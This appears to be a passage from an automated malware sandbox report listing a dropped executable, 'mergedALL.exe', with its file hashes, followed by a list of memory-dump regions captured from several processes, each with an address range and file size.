- \Users\Admin\AppData\Local\Temp\mergedALL.exe
  Filesize: 297KB
  MD5: 2359b2a186e08a38296305861dea4231
  SHA1: 41716e2710daaebba6f03d009064a149da90c526
  SHA256: f36f4c7bfb509bcfc5cdfb6eb28149bfca1b6ab3eb001bf74ef1e35f5edce9d6
  SHA512: 6ebcb5f9c3b6d76c59221d1442d4c39cc7a1108ae7ef63f3173cff0fcb5356e622369d2925c0d1992aec3a2605641a69e44891c804d320cbe36e164705d19c54
- memory/1556-233-0x0000000001CF0000-0x0000000001CF8000-memory.dmp
  Filesize: 32KB
- memory/1556-232-0x000000001B560000-0x000000001B842000-memory.dmp
  Filesize: 2.9MB
- memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmp
  Filesize: 8.3MB
- memory/1604-257-0x00000000000B0000-0x00000000000D0000-memory.dmp
  Filesize: 128KB
- memory/2248-279-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2248-281-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2248-282-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2248-276-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2248-277-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2248-278-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp
  Filesize: 120KB
- memory/2548-240-0x00000000009D0000-0x00000000009D8000-memory.dmp
  Filesize: 32KB
- memory/2548-239-0x0000000019F90000-0x000000001A272000-memory.dmp
  Filesize: 2.9MB
- memory/2588-245-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2588-244-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2588-243-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2588-242-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2588-241-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2588-247-0x0000000140000000-0x000000014000E000-memory.dmp
  Filesize: 56KB
- memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmp
  Filesize: 320KB